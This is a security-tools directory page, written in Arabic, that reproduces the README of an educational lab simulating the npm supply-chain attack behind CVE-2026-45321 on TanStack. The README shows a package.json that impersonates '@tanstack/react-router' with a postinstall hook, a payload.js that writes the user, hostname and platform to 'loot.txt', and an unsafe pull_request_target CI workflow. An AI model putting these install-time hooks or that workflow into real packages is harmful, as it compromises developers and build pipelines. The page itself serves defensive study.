Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-45321-Tanstack — مختبر تعليمي يحاكي هجمات سلسلة توريد npm، وإساءة استخدام CI/CD، وتنفيذ التعليمات البرمجية وقت التثبيت عبر CVE-2026-45321. بحث أمني دفاعي عملي لفهم اختراق التبعيات واستغلال خطافات دورة الحياة. | Kitploit
أدوات/GitHubGitHub/renewablehacking/cve-2026-45321-tanstack
تحليل الثغرات الأمنيةتحليل البرمجيات الخبيثةأمن سلسلة التوريدالتعلم والتعليممختبرات وتدريب عملي
GitHubrenewablehacking/cve-2026-45321-tanstack

CVE-2026-45321-Tanstack

مختبر تعليمي يحاكي هجمات سلسلة توريد npm، وإساءة استخدام CI/CD، وتنفيذ التعليمات البرمجية وقت التثبيت عبر CVE-2026-45321. بحث أمني دفاعي عملي لفهم اختراق التبعيات واستغلال خطافات دورة الحياة.

عرض المستودع
2منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

محاكاة هجوم سلسلة التوريد — CVE-2026-45321 (TanStack)

مختبر تعليمي لفهم هجمات سلسلة توريد npm، وإساءة استخدام CI/CD، وتنفيذ الكود وقت التثبيت

إخلاء مسؤولية

أُنشئ هذا المشروع فقط من أجل:

  • تعلم الأمن السيبراني،
  • أبحاث الأمن الدفاعي،
  • محاكاة مختبر محلي،
  • فهم مفهوم هجوم سلسلة التوريد.

لا تستخدم هذا المشروع من أجل:

  • مهاجمة أنظمة حقيقية،
  • سرقة بيانات الاعتماد،
  • نشر البرمجيات الخبيثة،
  • الوصول غير المصرح به،
  • أو أي أنشطة غير قانونية أخرى.

الوصف

يحاكي هذا المختبر المفاهيم الأساسية للحادثة:

  • CVE-2026-45321
  • اختراق سلسلة توريد npm في TanStack
  • إساءة استخدام GitHub Actions في CI/CD
  • تنفيذ سكربتات دورة حياة npm

تُنفَّذ المحاكاة محليًا وبأمان دون:

  • سرقة بيانات اعتماد حقيقية،
  • تسريب الرموز (tokens)،
  • أو المساس بخدمات طرف ثالث.

بنية المختبر

root@kitploit:~
lab/
├── fake-repo/          # محاكاة المستودع المستهدف
├── attacker-package/   # محاكاة الحزمة الخبيثة
└── victim-project/     # محاكاة الضحية

آلية عمل المحاكاة

root@kitploit:~
حزمة المهاجم
        ↓
npm install
        ↓
تشغيل سكربت postinstall
        ↓
تنفيذ payload.js تلقائيًا
        ↓
إصابة الضحية بالتنفيذ وقت التثبيت

المفاهيم التي يتم تعلمها

  • خطافات دورة حياة npm (npm lifecycle hooks)
  • تنفيذ تعسفي للكود وقت التثبيت
  • هجوم سلسلة التوريد
  • حدود الثقة في CI/CD
  • حزمة npm خبيثة
  • إساءة استخدام postinstall
  • اختراق التبعيات

التثبيت

1. استنساخ المستودع

root@kitploit:~
git clone https://github.com/renewablehacking/CVE-2026-45321-Tanstack.git

cd CVE-2026-45321-Tanstack

إعداد حزمة المهاجم

2. الانتقال إلى مجلد حزمة المهاجم

root@kitploit:~
cd attacker-package

3. تثبيت التبعيات

root@kitploit:~
npm install

4. بناء حزمة Tarball

root@kitploit:~
npm pack

النتيجة:

root@kitploit:~
tanstack-react-router-1.169.5.tgz

محاكاة الضحية

5. الانتقال إلى مشروع الضحية

root@kitploit:~
cd ../victim-project

6. تثبيت الحزمة الخبيثة

root@kitploit:~
npm install ../attacker-package/tanstack-react-router-1.169.5.tgz --foreground-scripts

المخرجات

إذا نجحت المحاكاة فسيظهر:

root@kitploit:~
=== MALICIOUS PAYLOAD EXECUTED ===

وسيتم إنشاء الملف:

root@kitploit:~
loot.txt

بشكل تلقائي.


مثال على payload.js

root@kitploit:~
const os = require('os');
const fs = require('fs');

console.log("=== MALICIOUS PAYLOAD EXECUTED ===");

const info = `
USER=${process.env.USER}
HOST=${os.hostname()}
PLATFORM=${os.platform()}
`;

console.log(info);

fs.writeFileSync("loot.txt", info);

مثال على package.json

root@kitploit:~
{
  "name": "@tanstack/react-router",
  "version": "1.169.5",
  "scripts": {
    "postinstall": "node payload.js"
  }
}

محاكاة CI/CD

يمكن أيضًا استخدام هذا المشروع لفهم:

  • GitHub Actions
  • pull_request_target
  • حدود صلاحيات CI/CD
  • تنفيذ التبعيات

مثال على سير العمل (workflow):

root@kitploit:~
name: CI

on:
  pull_request_target:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - run: npm install

العلاقة مع CVE-2026-45321

محاكاة المختبرالعالم الحقيقي
attacker-packageحزمة TanStack المخترقة
payload.jsالمثبّت الخبيث
postinstallإساءة استخدام خطاف دورة الحياة
victim-projectمطوّر/CI الضحية
fake-repoخط أنابيب GitHub Actions

المراجع

  • https://nvd.nist.gov/vuln/detail/CVE-2026-45321
  • https://tanstack.com/blog/npm-supply-chain-compromise-postmortem
  • https://docs.npmjs.com/cli/v10/using-npm/scripts
  • https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions

لأغراض تعليمية فقط

أُنشئ هذا المختبر لزيادة الوعي بشأن:

  • أمن سلسلة التوريد،
  • أمن التبعيات،
  • أمن CI/CD،
  • وأبحاث الأمن الدفاعي.
تنزيل الأداة